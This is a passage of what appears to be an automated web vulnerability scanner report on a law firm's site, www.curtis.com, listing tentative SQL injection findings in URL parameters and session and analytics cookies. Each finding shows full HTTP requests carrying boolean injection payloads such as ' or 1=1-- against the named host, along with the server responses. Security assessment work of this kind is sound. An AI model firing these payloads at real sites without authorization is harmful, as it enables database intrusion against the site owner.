       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.56. http://www.curtis.com/sifr3/gillsans.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/gillsans.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14043355'%20or%201%3d1--%20 and 14043355'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr3/gillsans.swf14043355'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr3/gillsans.swf14043355'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.57. http://www.curtis.com/sitecontent.cfm [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 18432304%20or%201%3d1--%20 and 18432304%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584318432304%20or%201%3d1--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:01:03 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584318432304%20or%201%3d2--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175952;path=/
Set-Cookie: CFTOKEN=14488976;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::offices::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.l
...[SNIP]...

1.58. http://www.curtis.com/sitecontent.cfm [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 90677941%20or%201%3d1--%20 and 90677941%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569790677941%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:01:13 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569790677941%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175975;path=/
Set-Cookie: CFTOKEN=25170816;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::offices::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.l
...[SNIP]...

1.59. http://www.curtis.com/sitecontent.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15382433'%20or%201%3d1--%20 and 15382433'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm15382433'%20or%201%3d1--%20?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sitecontent.cfm15382433'%20or%201%3d2--%20?pageid=11 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.3.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.60. http://www.curtis.com/sitecontent.cfm [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 74416649'%20or%201%3d1--%20 and 74416649'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.174416649'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:00:58 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.174416649'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.61. http://www.curtis.com/sitecontent.cfm [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 13432204'%20or%201%3d1--%20 and 13432204'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.130314580313432204'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:01:18 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
